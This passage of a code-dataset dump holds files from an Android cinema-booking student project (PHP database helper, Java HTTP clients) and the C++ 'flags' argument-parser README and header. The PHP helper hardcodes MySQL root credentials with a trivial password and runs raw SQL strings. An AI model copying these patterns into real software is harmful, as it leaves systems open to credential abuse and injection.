CharSequence[brojSlobodnihSj];\r\n\t\t\t\r\n\t\t\tfor (int i = 1; i<=BROJ_SJEDALA; i++)\r\n\t\t\t{\r\n\t\t\t\tif(!sjedalaZauzeta.contains(i))\r\n\t\t\t\t{\r\n\t\t\t\t\tsjedalaPrikaz[indeksNiza] = \"Sjedalo \" + Integer.toString(i);\r\n\t\t\t\t\tsjedalaBool[indeksNiza] = false;\r\n\t\t\t\t\tindeksNiza += 1;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tint brojSlobodnihSj = BROJ_SJEDALA;\r\n\t\t\tsjedalaBool = new boolean[brojSlobodnihSj];\r\n\t\t\tsjedalaPrikaz = new CharSequence[brojSlobodnihSj];\r\n\t\t\t\r\n\t\t\t//punimo nizove sa prikazom slobodnih sjedala i opcijom odabira checkboxa\r\n\t\t\tfor (int i = 1; i<=BROJ_SJEDALA; i++)\r\n\t\t\t{\t\t\t\t\r\n\t\t\t\tsjedalaPrikaz[indeksNiza] = \"Sjedalo \" +Integer.toString(i);\r\n\t\t\t\tsjedalaBool[indeksNiza] = false;\r\n\t\t\t\tindeksNiza += 1;\r\n\t\t\t}\r\n\t\t}\r\n\t\t\r\n\r\n\t\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.44540902972221375, "alphanum_fraction": 0.4504173696041107, "avg_line_length": 24.289474487304688, "blob_id": "6f2864fa2bee298a8a71e8a9290abace6266a067", "content_id": "bbd104128d9a0c1b18b4aff7bbf33797b531e8a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 3005, "license_type": "no_license", "max_line_length": 118, "num_lines": 114, "path": "/server-side/Datoteke/skripte/DB_connect.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n //klasa za izvršavanje upita nad bazom\r\n define(\"HOST\", \"localhost\");\r\n define(\"USER\", \"root\");\r\n define(\"PASS\", \"123456\");\r\n define(\"BAZA\", \"airbaza\");\r\n\r\n class Upit {\r\n public $conn;\r\n\r\n function __construct() {\r\n $this->conn = new mysqli(HOST, USER, PASS, BAZA);\r\n if ($this->conn->connect_errno) {\r\n die('Pogreška pri spajanju na bazu podataka. Jesu li podaci ispravno uneseni? MySQL kaže: <br>'\r\n . 
$this->conn->connect_error);\r\n } \r\n $this->conn->set_charset(\"utf8\");\r\n }\r\n\r\n function Izvrsi($upit) {\r\n $rezultat = $this->conn->query($upit);\r\n\r\n if(! $rezultat) {\r\n die(\"Problem pri uonsu u bazu. MySQL kaže: <br>\" . $this->conn->error);\r\n } else {\r\n return $rezultat;\r\n }\r\n }\r\n\r\n function __destruct() {\r\n $this->conn->close();\r\n }\r\n \r\n }\r\n \r\n//******************************************************************************************************************//\r\n //Ova funkcija služi za brže izvršavanje sql upita\r\n function Upit($naredba) {\r\n /*$upit = new Upit();\r\n $upit->Izvrsi(\"SET CHARACTER SET utf8\");\r\n unset($upit);*/\r\n $upit = new Upit();\r\n $rezultat = $upit->Izvrsi($naredba);\r\n unset($upit);\r\n return $rezultat;\r\n }\r\n //transakcije\r\n function begin()\r\n {\r\n Upit(\"BEGIN\");\r\n }\r\n function commit()\r\n {\r\n Upit(\"COMMIT\");\r\n }\r\n function rollback()\r\n {\r\n Upit(\"ROLLBACK\");\r\n }\r\n //funkcija za izvršavanje transakcije\r\n function Transakcija($upit)\r\n {\r\n $rezultat = Upit($upit); \r\n \r\n if ($rezultat > 0)\r\n {\r\n // $rezultat->fetch_assoc(); \r\n return $rezultat;\r\n\r\n } else\r\n { \r\n //print_r($rezultat);\r\n $zapis = -6;\r\n return $zapis;\r\n }\r\n }\r\n\t\r\n\tfunction BrisanjeIzBaze($naredba)\r\n\t{\r\n\t\t$upit = new Upit();\r\n\t\t$upit->Izvrsi($naredba);\r\n\t\t\r\n\t\t$zapis = array();\r\n\t\tif ($upit->conn->affected_rows > 0)\r\n\t\t{\r\n\t\t\t$zapis[0] = array(\"povratnaInformacijaId\" => 0, \"povratnaInformacijaTekst\" => utf8_encode(\"Uspješno obrisano\"));\r\n\t\t} else\r\n\t\t{\r\n\t\t\t$zapis[0] = array(\"povratnaInformacijaId\" => -8, \"povratnaInformacijaTekst\" => utf8_encode(\"Ništa nije obrisano\"));\r\n\t\t}\r\n\t\t\r\n\t\treturn $zapis;\r\n\t}\r\n \r\n function UpitUBazu($upit)\r\n {\r\n $rezultat = Upit($upit);\r\n $zapisi = array();\r\n if ($rezultat->num_rows > 0)\r\n {\r\n while ($zapis = $rezultat->fetch_assoc())\r\n {\r\n $zapisi[] = $zapis;\r\n }\r\n \r\n return $zapisi;\r\n } else\r\n {\r\n $zapis = array();\r\n $zapis[0] = array(\"povratnaInformacijaId\" => 1, \"povratnaInformacijaTekst\" => utf8_encode(\"Nema zapisa\"));\r\n return $zapis;\r\n }\r\n }\r\n?>" }, { "alpha_fraction": 0.6906993389129639, "alphanum_fraction": 0.6928622722625732, "avg_line_length": 27.72142791748047, "blob_id": "b55fa5338f438c1e2ada8e50e2994150b6479b19", "content_id": "597678c0fc59ff0fdd93607b43818c9e7ff607e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 4173, "license_type": "no_license", "max_line_length": 153, "num_lines": 140, "path": "/client-side/src/hr/air/mkino/server/JsonMojeRezervacije.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport hr.air.mkino.tipovi.RezervacijaInfo;\r\nimport java.io.IOException;\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\nimport org.apache.http.client.methods.HttpGet;\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\nimport 
android.content.Context;\r\nimport android.os.AsyncTask;\r\n/**\r\n * Klasa koja služi za dohvaćanje korisničkih rezervacija sa web servisa.\r\n * @author bstivic\r\n *\r\n */\r\npublic class JsonMojeRezervacije extends AsyncTask<String, Void, String> {\r\n\t\r\n\tpublic List<RezervacijaInfo> dohvati(String korisnickoIme, Context c)\r\n\t{\t\t\t\t\t\r\n\t\tthis.execute(korisnickoIme);\r\n\t\tString jsonRezultat = \"\";\r\n\t\ttry {\r\n\t\t\tjsonRezultat = this.get();\r\n\t\t} catch (InterruptedException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t} catch (ExecutionException e) {\r\n\t\t\t\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\treturn parsirajJson(jsonRezultat, c);\t\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja služi za parsiranje json odgovora servera\r\n\t * @param jsonRezultat\r\n\t * @param context\r\n\t * @return lista rezervacija\r\n\t */\r\n\tprivate List<RezervacijaInfo> parsirajJson(String jsonRezultat, Context c) {\t\t\r\n\t\tList<RezervacijaInfo> rezervacija = new ArrayList<RezervacijaInfo>();\t\t\r\n\t\tProjekcijaInfo projekcija = null;\r\n\t\tProjekcijeAdapter projekcijaAdapter = new ProjekcijeAdapter(c);\r\n\t\ttry {\r\n\t\t\tint idRezervacije = 0 ;\r\n\t\t\tint idProjekcije = -6;\r\n\t\t\tint pomocniIdProjekcije = -7;\r\n\t\r\n\t\t\tList<Integer> sjedala = null;\r\n\t\t\tString kodRezervacije = null;\r\n\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\r\n\t\t\tint n = rezultati.length();\r\n\t\t\tfor(int i=0; i<n; i++) \r\n\t\t\t{\r\n\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\tidProjekcije = rezultat.getInt(\"idProjekcije\");\r\n\t\t\t\t\r\n\t\t\t\t//uvjet će se izvršiti ukoliko imamo više sjedala za istu projekciju, pa ih unosimo u listu i nije potrebno upisivat već poznate podatke o pr0jekciji\r\n\t\t\t\tif(idProjekcije == pomocniIdProjekcije)\r\n\t\t\t\t{\r\n\t\t\t\t\tsjedala.add(rezultat.getInt(\"brojSjedala\"));\t\r\n\t\t\t\t\tif(i == n-1)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprojekcija = projekcijaAdapter.dohvatiProjekciju(idProjekcije, c);\r\n\t\t\t\t\t\trezervacija.add(new RezervacijaInfo(idRezervacije, idProjekcije, \"\", kodRezervacije, sjedala, projekcija));\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t\t//inače se radi o drugoj projekciji pa je potrebno unijeti nove podatke\r\n\t\t\t\telse\r\n\t\t\t\t{\r\n\t\t\t\t\tif(i != 0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tprojekcija = projekcijaAdapter.dohvatiProjekciju(pomocniIdProjekcije, c);\r\n\t\t\t\t\t\trezervacija.add(new RezervacijaInfo(idRezervacije, pomocniIdProjekcije, \"\", kodRezervacije, sjedala, projekcija));\r\n\t\t\t\t\t}\r\n\t\t\t\t\t\r\n\t\t\t\t\tsjedala = new ArrayList<Integer>();\r\n\t\t\t\t\tidRezervacije = rezultat.getInt(\"idRezervacije\");\t\t\t\t\t\t\r\n\t\t\t\t\tkodRezervacije = rezultat.getString(\"kod\");\r\n\t\t\t\t\tsjedala.add(rezultat.getInt(\"brojSjedala\"));\t\r\n\t\t\t\t\tpomocniIdProjekcije = idProjekcije;\r\n\t\t\t\t}\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\t\r\n\t\t}\t\t\t\r\n\t\tcatch (JSONException e) {\t\r\n\r\n\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t}\r\n\t\t\r\n\t\treturn rezervacija;\r\n\t}\r\n\r\n\t/**\r\n\t * Pomoćna metoda koja u pozadini obrađuje http zahtjev (dohvaćanje podataka)\r\n\t */\r\n\t@Override\r\n\tprotected String doInBackground(String... 
parametri) {\r\n\t\tString korisnik = parametri[0];\r\n\r\n\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\tHttpGet httpZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=mr&korisnik=\"+korisnik);\r\n\t\t\r\n\t\tString jsonResult = \"\";\r\n\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\r\n\t\ttry {\r\n\t\t\tjsonResult = httpKlijent.execute(httpZahtjev, handler);\r\n\t\t}\r\n\t\tcatch(ClientProtocolException e){\r\n\t\t\tString pogreska = e.toString();\r\n\t\t\te.printStackTrace();\r\n\t\t\r\n\t\t\tpogreska.charAt(0);\r\n\t\t}\r\n\t\tcatch(IOException e){\r\n\t\t\te.printStackTrace();\r\n\t\t}\r\n\t\t\r\n\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\r\n\t\treturn jsonResult;\r\n\t}\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6810725331306458, "alphanum_fraction": 0.6817034482955933, "avg_line_length": 25.807018280029297, "blob_id": "20d06396c310df1bb88ece650ff6ad5fd607d3b0", "content_id": "cad3a8f27087e23184e039026d858581218157cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 3180, "license_type": "no_license", "max_line_length": 140, "num_lines": 114, "path": "/client-side/src/hr/air/mkino/server/JsonDohvatiSjedala.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.server;\r\n\r\nimport java.io.IOException;\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.List;\r\nimport java.util.concurrent.ExecutionException;\r\n\r\n\r\nimport org.apache.http.client.ClientProtocolException;\r\nimport org.apache.http.client.HttpClient;\r\nimport org.apache.http.client.ResponseHandler;\r\n\r\nimport org.apache.http.client.methods.HttpGet;\r\n\r\nimport org.apache.http.impl.client.BasicResponseHandler;\r\nimport org.apache.http.impl.client.DefaultHttpClient;\r\n\r\nimport org.json.JSONArray;\r\nimport org.json.JSONException;\r\nimport org.json.JSONObject;\r\n\r\n\r\nimport android.os.AsyncTask;\r\n/**\r\n * klasa koja služi za prijavu korisnika u sustav uz pomoć asinkrone komunikacije \r\n * između aplikacije i servisa koji provjerava da li postoji korisnik u bazi \r\n * podataka sa navedenim korisničkim imenom i lozinkom\r\n * @author bstivic\r\n * */\r\npublic class JsonDohvatiSjedala extends AsyncTask<Integer, List<Integer>, String> {\r\n\r\n\r\n\t\tpublic List<Integer> dohvatiSjedala(int idProjekcije)\r\n\t\t{\t\t\t\r\n\t\t\tthis.execute(idProjekcije);\r\n\t\t\tString jsonRezultat = \"\";\r\n\t\t\ttry {\r\n\t\t\t\tjsonRezultat = this.get();\r\n\t\t\t} catch (InterruptedException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t} catch (ExecutionException e) {\r\n\t\t\t\t\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn parsirajJson(jsonRezultat);\t\t\t\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Parsira json string dohvaćen s web servisa\r\n\t\t * @param jsonRezultat\r\n\t\t * @return popunjeni objekt tipa Korisnik(korisnickoIme, \"\", ime, prezime, email, telefon) \r\n\t\t * ukoliko je prijava uspjesna ili null ukoliko prijava nije uspjesna\r\n\t\t */\r\n\t\t\r\n\t\tprivate List<Integer> parsirajJson(String jsonRezultat) {\t\t\r\n\r\n\t\t\tList<Integer> listaZauzetih = new ArrayList<Integer>() ;\r\n\t\t\ttry {\r\n\t\t\t\t\tJSONArray rezultati = new JSONArray(jsonRezultat);\r\n\t\t\t\t\tint n = rezultati.length();\r\n\t\t\t\t\tfor(int i=0; i<n; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tJSONObject rezultat = rezultati.getJSONObject(i);\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\tString sjedaloStrng = 
rezultat.getString(\"brojSjedala\");\r\n\t\t\t\t\t\tlistaZauzetih.add(Integer.parseInt(sjedaloStrng));\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t}\r\n\t\t\t}\t\t\t\r\n\t\t\tcatch (JSONException e) {\t\r\n\t\t\t/*\r\n\t\t\t * izvršava se ukoliko prijava nije uspješna, odnosno ne postoji\r\n\t\t\t * korisnik sa traženim korisničkim imenom i lozinkom\r\n\t\t\t * */\r\n\t\t\t\te.printStackTrace();\t\t\t\t\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn listaZauzetih;\r\n\t\t}\r\n\r\n\t\t/**\r\n\t\t * Metoda za asinkronu komunikaciju između aplikacije i servisa.\r\n\t\t * @param korisnicko ime i lozinka u obliku ArrayList\r\n\t\t * @return odgovor servisa u json obliku\r\n\t\t * */\r\n\t\tprotected String doInBackground(Integer... idProjekcije) {\r\n\t\t\tHttpClient httpKlijent = new DefaultHttpClient();\r\n\t\t \r\n\t\t\tHttpGet httpGetZahtjev = new HttpGet(\"http://mkinoairprojekt.me.pn/skripte/index.php?tip=sjedalaProjekcija&projekcija=\"+idProjekcije[0]);\r\n\t\t\tString jsonResult = \"\";\r\n\t\t\tResponseHandler<String> handler = new BasicResponseHandler();\r\n\t\t\t\r\n\t\t\t\r\n\t\t\ttry {\t\t\t\r\n\t\t\t\t\t \r\n\t\t\t\tjsonResult = httpKlijent.execute(httpGetZahtjev, handler);\r\n\t\t\t}\r\n\t\t\tcatch(ClientProtocolException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\tcatch(IOException e){\r\n\t\t\t\te.printStackTrace();\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\thttpKlijent.getConnectionManager().shutdown();\r\n\t\t\treturn jsonResult;\r\n\t\t}\r\n\r\n\t\r\n\r\n}\r\n" }, { "alpha_fraction": 0.6753926873207092, "alphanum_fraction": 0.6753926873207092, "avg_line_length": 16.365385055541992, "blob_id": "4ea68768c0376225ae6882162068ed3fbfb28d17", "content_id": "970a30cd2a04d0b49c080f456e1008e0be682dd0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 956, "license_type": "no_license", "max_line_length": 85, "num_lines": 52, "path": "/client-side/src/hr/air/mkino/tipovi/Korisnik.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino.tipovi;\r\n\r\n/**\r\n * Klasa predstavlja složeni tip podataka koji opisuje pojedinog korisnika aplikacije\r\n * \r\n * */\r\npublic class Korisnik {\r\n\tprivate String korisnickoIme;\r\n\tprivate String lozinka;\r\n\tprivate String ime;\r\n\tprivate String prezime;\r\n\tprivate String email;\r\n\tprivate String telefon;\r\n\r\n\t\r\n\tpublic Korisnik(String korisnickoIme, String lozinka, String ime,\r\n\t\t\tString prezime, String email, String telefon) {\r\n\t\tthis.korisnickoIme = korisnickoIme;\r\n\t\tthis.lozinka = lozinka;\r\n\t\tthis.ime = ime;\r\n\t\tthis.prezime = prezime;\r\n\t\tthis.email = email;\r\n\t\tthis.telefon = telefon;\r\n\r\n\t}\r\n\t\r\n\tpublic String getKorisnickoIme()\r\n\t{\r\n\t\treturn korisnickoIme;\r\n\t}\r\n\tpublic String getLozinka()\r\n\t{\r\n\t\treturn lozinka;\r\n\t}\r\n\tpublic String getIme()\r\n\t{\r\n\t\treturn ime;\r\n\t}\r\n\tpublic String getPrezime()\r\n\t{\r\n\t\treturn prezime;\r\n\t}\r\n\tpublic String getEmail()\r\n\t{\r\n\t\treturn email;\r\n\t}\r\n\tpublic String getTelefon()\r\n\t{\r\n\t\treturn telefon;\r\n\t}\r\n\t\r\n}\r\n" } ]
24
sailormoon/flags
https://github.com/sailormoon/flags
789c0eb33d940569fda4c7fdd6b413674b90d9f0
45fa9e968eb21328b2e60be384f2b1e2b3af0af4
c1d201e5c7d4090342c9cf16c627d3ac04c8cb86
refs/heads/master
2023-08-17T14:27:14.839138
2023-08-17T09:22:03
2023-08-17T09:22:03
73,530,193
252
25
Unlicense
2016-11-12T03:53:52
2023-08-09T15:37:36
2023-09-10T21:13:39
C++
[ { "alpha_fraction": 0.6736325621604919, "alphanum_fraction": 0.6807854175567627, "avg_line_length": 25.604476928710938, "blob_id": "c198411a370dd739f32a3da560066221366fb79d", "content_id": "0d63a5502029dc7f00bc43cea8ff69c45d65fa73", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 7132, "license_type": "permissive", "max_line_length": 227, "num_lines": 268, "path": "/README.md", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "# ⛳ flags\n[![Build Status](https://travis-ci.org/sailormoon/flags.svg?branch=master)](https://travis-ci.org/sailormoon/flags)\n\nSimple, extensible, header-only C++17 argument parser released into the public domain.\n\n\n<!-- vim-markdown-toc GFM -->\n\n* [why](#why)\n* [requirements](#requirements)\n* [api](#api)\n * [get](#get)\n * [get (with default value)](#get-with-default-value)\n * [positional](#positional)\n* [usage](#usage)\n * [example](#example)\n * [another example](#another-example)\n * [extensions](#extensions)\n * [example](#example-1)\n * [command line details](#command-line-details)\n * [key formatting](#key-formatting)\n * [value assignment](#value-assignment)\n * [bools](#bools)\n* [testing](#testing)\n* [contributing](#contributing)\n\n<!-- vim-markdown-toc -->\n\n# why\nOther argument parsers are:\n- bloated\n- non-extensible\n- not modern\n- complicated\n\n# requirements\nGCC 7.0 or Clang 4.0.0 at a minimum. This library makes extensive use of `optional`, `nullopt`, and `string_view`.\n\n# api\n`flags::args` exposes seven methods:\n\n## get\n`std::optional<T> get(const std::string_view& key) const`\n\nAttempts to parse the given key on the command-line. If the string is malformed or the argument was not passed, returns `nullopt`. Otherwise, returns the parsed type as an optional.\n\n## get (with default value)\n`T get(const std::string_view& key, T&& default_value) const`\n\nFunctions the same as `get`, except if the value is malformed or the key was not provided, returns `default_value`. Otherwise, returns the parsed type.\n\n## get_multiple\n`std::vector<std::optional<T>> get_multiple(const std::string_view& option) const`\n\nGet all values passed for an option. If no value is specified (`--foo --bar`) or the value is malformed, `nullopt` will be used. Values will be in the order they were passed.\n\n## get_multiple (with default value)\n`std::vector<T> get_multiple(const std::string_view& option, T&& default_value) const`\n\nFunctions the same as `get_multiple`, except if the value is malformed or no value is provided, `default_value` will be used.\n\n## get (positional)\n`std::optional<T> get(size_t positional_index) const`\n\nGet an argument from the positional arguments at a specified index. If the value is malformed or the index is invalid, `nullopt` is returned.\n\n## get (positional with default value)\n`T get(size_t positional_index, T&& default_value) const`\n\nFunctions the same as positional `get`, except if the value is malformed or the index is invalid, returns `default_value`. 
Otherwise, returns the parsed type.\n\n## positional\n`const std::vector<std::string_view>& positional() const`\n\nReturns all of the positional arguments from argv in order.\n\n# usage\n### just the headers\nJust include `flags.h` from the `include` directory into your project.\n\n## Using CMake\n\n### CMake Installation\n\nFlags can be built and installed using [CMake], e.g.\n\n```sh\n$ mkdir build\n$ cd build\n$ cmake ..\n$ make\n$ make install\n```\n\nThe above will install Flags into the standard installation path on a UNIX\nsystem, e.g. `/usr/local/include/`. To change the installation path, use:\n\n```sh\n$ cmake .. -DCMAKE_INSTALL_PREFIX=../install\n```\n\nin the above.\n\n### `find_package`\n\nInstallation creates a `flags-config.cmake` which allows CMake\nprojects to find Flags using `find_package`:\n\n```cmake\nfind_package(flags)\n```\n\nThis exports the `flags` target which can be linked against any other\ntarget. Linking against `flags` automatically sets the include\ndirectories and required flags for C++17 or later. For example:\n\n```cmake\nadd_executable(myexe mysources...)\ntarget_link_libraries(myexe PRIVATE flags)\n```\n\n### `add_subdirectory`\n\nThe Flags can also be added as a dependency with `add_subdirectory`:\n\n```cmake\nadd_subdirectory(path/to/flags)\n```\n\nThis also exports the `flags` target which can be linked against any\nother target just as with the installation case.\n\n## example\n```c++\n#include \"flags.h\" // #include <flags.h> for cmake\n#include <iostream>\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n\n const auto count = args.get<int>(\"count\");\n if (!count) {\n std::cerr << \"No count supplied. :(\\n\";\n return 1;\n }\n std::cout << \"That's \" << *count << \" incredible, colossal credits!\\n\";\n\n if (args.get<bool>(\"laugh\", false)) {\n std::cout << \"Ha ha ha ha!\\n\";\n }\n return 0;\n}\n```\n```bash\n$ ./program\n> No count supplied. :(\n```\n```bash\n$ ./program --count=5 --laugh\n> That's 5 incredible, colossal credits!\n> Ha ha ha ha!\n```\n\n## another example\n```c++\n#include \"flags.h\" // #include <flags.h> for cmake\n#include <iostream>\n#include <string>\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n const auto& files = args.positional();\n const auto verbose = args.get<bool>(\"verbose\", false);\n if (verbose) {\n std::cout << \"I'm a verbose program! I'll be reading the following files:\\n\";\n for (const auto& file : files) {\n std::cout << \"* \" << file << '\\n';\n }\n }\n // read files(files);\n return 0;\n}\n```\n```bash\n$ ./program /tmp/one /tmp/two /tmp/three --verbose\n> I'm a verbose program! I'll be reading the following files:\n> * /tmp/one\n> * /tmp/two\n> * /tmp/three\n```\n```bash\n$ ./program /tmp/one /tmp/two /tmp/three --noverbose\n>%\n```\n\n## extensions\n`flags` simply uses the `istream` operator to parse values from `argv`. 
To extend the parser to support your own types, just supply an overloaded `>>`.\n\n### example\n```c++\nstruct Date {\n int day;\n int month;\n int year;\n};\n\n// Custom parsing code.\nstd::istream& operator>>(std::istream& stream, Date& date) {\n return stream >> date.day >> date.month >> date.year;\n}\n\nint main(int argc, char** argv) {\n const flags::args args(argc, argv);\n if (const auto date = args.get<Date>(\"date\")) {\n // Output %Y/%m/%d if a date was provided.\n std::cout << date->year << \":\" << date->month << \":\" << date->day << '\\n';\n return 0;\n }\n // Sad face if no date was provided or if the input was malformed.\n std::cerr << \":(\\n\";\n return 1;\n}\n```\n\n```bash\n$ ./program --date=\"10 11 2016\"\n> 2016:11:10\n```\n\n```bash\n$ ./program\n> :(\n```\n\n## command line details\n`flags`'s primary goal is to be simple to use for both the user and programmer.\n\n### key formatting\nA key can have any number of preceding `-`s, but must have more than 0.\nThe following are valid keys:\n- `-key`\n- `--key`\n- `-------------key`\n\n### value assignment\nA value can be assigned to a key in one of two ways:\n- `$ ./program --key=value`\n- `$ ./program --key value`\n\n#### bools\nbooleans are a special case. The following values make an argument considered `false`-y when parsed as a bool:\n- `f`\n- `false`\n- `n`\n- `no`\n- `0`\n\nIf none of these conditions are met, the bool is considered `true`.\n\n# testing\nflags uses both [bfg9000](https://github.com/jimporter/bfg9000) and [mettle](https://github.com/jimporter/mettle) for unit-testing. After installing both `bfg9000` and `mettle`, run the following commands to kick off the tests:\n\n1. `9k build/`\n2. `cd build`\n3. `ninja test`\n\n# contributing\nContributions of any variety are greatly appreciated. All code is passed through `clang-format` using the Google style.\n" }, { "alpha_fraction": 0.6518265008926392, "alphanum_fraction": 0.6524491310119629, "avg_line_length": 32, "blob_id": "4890b910276acdb5e5fbb693bf79276e3fea397e", "content_id": "3063f495d9a801a0b456a7fbfdd6d8d8e66ff6aa", "detected_licenses": [ "LicenseRef-scancode-public-domain", "Unlicense" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 9636, "license_type": "permissive", "max_line_length": 88, "num_lines": 292, "path": "/include/flags.h", "repo_name": "sailormoon/flags", "src_encoding": "UTF-8", "text": "#ifndef FLAGS_H_\n#define FLAGS_H_\n\n#include <algorithm>\n#include <array>\n#include <optional>\n#include <sstream>\n#include <string>\n#include <string_view>\n#include <unordered_map>\n#include <vector>\n\nnamespace flags {\nnamespace detail {\nusing argument_map =\n std::unordered_map<std::string_view, std::vector<std::optional<std::string_view>>>;\n\n// Non-destructively parses the argv tokens.\n// * If the token begins with a -, it will be considered an option.\n// * If the token does not begin with a -, it will be considered a value for the\n// previous option. 
If there was no previous option, it will be considered a\n// positional argument.\nstruct parser {\n parser(const int argc, char** argv) {\n for (int i = 1; i < argc; ++i) {\n churn(argv[i]);\n }\n // If the last token was an option, it needs to be drained.\n flush();\n }\n parser& operator=(const parser&) = delete;\n\n const argument_map& options() const { return options_; }\n const std::vector<std::string_view>& positional_arguments() const {\n return positional_arguments_;\n }\n\n private:\n // Advance the state machine for the current token.\n void churn(const std::string_view& item) {\n if(item.empty())\n {\n on_value(item);\n return;\n }\n item.at(0) == '-' ? on_option(item) : on_value(item);\n }\n\n // Consumes the current option if there is one.\n void flush() {\n if (current_option_) on_value();\n }\n\n void on_option(const std::string_view& option) {\n // Consume the current_option and reassign it to the new option while\n // removing all leading dashes.\n flush();\n current_option_ = option;\n current_option_->remove_prefix(current_option_->find_first_not_of('-'));\n\n // Handle a packed argument (--arg_name=value).\n if (const auto delimiter = current_option_->find_first_of('=');\n delimiter != std::string_view::npos) {\n auto value = *current_option_;\n value.remove_prefix(delimiter + 1 /* skip '=' */);\n current_option_->remove_suffix(current_option_->size() - delimiter);\n on_value(value);\n }\n }\n\n void on_value(const std::optional<std::string_view>& value = std::nullopt) {\n // If there's not an option preceding the value, it's a positional argument.\n if (!current_option_) {\n if (value) positional_arguments_.emplace_back(*value);\n return;\n }\n // Consume the preceding option and assign its value.\n // operator[] will insert an empty vector if needed\n options_[*current_option_].emplace_back(std::move(value));\n current_option_.reset();\n }\n\n std::optional<std::string_view> current_option_;\n argument_map options_;\n std::vector<std::string_view> positional_arguments_;\n};\n\n// If a key exists, return an optional populated with its value.\ninline std::optional<std::string_view> get_value(\n const argument_map& options, const std::string_view& option) {\n if (const auto it = options.find(option); it != options.end()) {\n // If a key exists, there must be at least one value\n return it->second[0];\n }\n return std::nullopt;\n}\n\n// If a key exists, return a vector with its values\ninline std::vector<std::optional<std::string_view>> get_values(\n const argument_map& options, const std::string_view& option) {\n if (const auto it = options.find(option); it != options.end()) {\n return it->second;\n }\n return {};\n}\n\n// Coerces the string value of the given option into <T>.\n// If the value cannot be properly parsed or the key does not exist, returns\n// nullopt.\ntemplate <class T>\nstd::optional<T> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto view = get_value(options, option)) {\n if (T value; std::istringstream(std::string(*view)) >> value) return value;\n }\n return std::nullopt;\n}\n\n// Since the values are already stored as strings, there's no need to use `>>`.\ntemplate <>\ninline std::optional<std::string_view> get(const argument_map& options,\n const std::string_view& option) {\n return get_value(options, option);\n}\n\ntemplate <>\ninline std::optional<std::string> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto view = get<std::string_view>(options, option)) {\n return 
std::string(*view);\n }\n return std::nullopt;\n}\n\n// Special case for booleans: if the value is any of the below, the option will\n// be considered falsy. Otherwise, it will be considered truthy just for being\n// present.\nconstexpr std::array<const char*, 5> falsities{{\"0\", \"n\", \"no\", \"f\", \"false\"}};\ntemplate <>\ninline std::optional<bool> get(const argument_map& options,\n const std::string_view& option) {\n if (const auto value = get_value(options, option)) {\n return std::none_of(falsities.begin(), falsities.end(),\n [&value](auto falsity) { return *value == falsity; });\n }\n if (options.find(option) != options.end()) return true;\n return std::nullopt;\n}\n\n// Coerces the string values of the given option into std::vector<T>.\n// If a value cannot be properly parsed it is not added. If there are\n// no suitable values or the key does not exist, returns nullopt.\ntemplate <class T>\nstd::vector<std::optional<T>> get_multiple(const argument_map& options,\n const std::string_view& option) {\n std::vector<std::optional<T>> values;\n const auto views = get_values(options, option);\n for (const auto &view : views) {\n if (!view) {\n values.push_back(std::nullopt);\n continue;\n }\n if (T value; std::istringstream(std::string(*view)) >> value) {\n 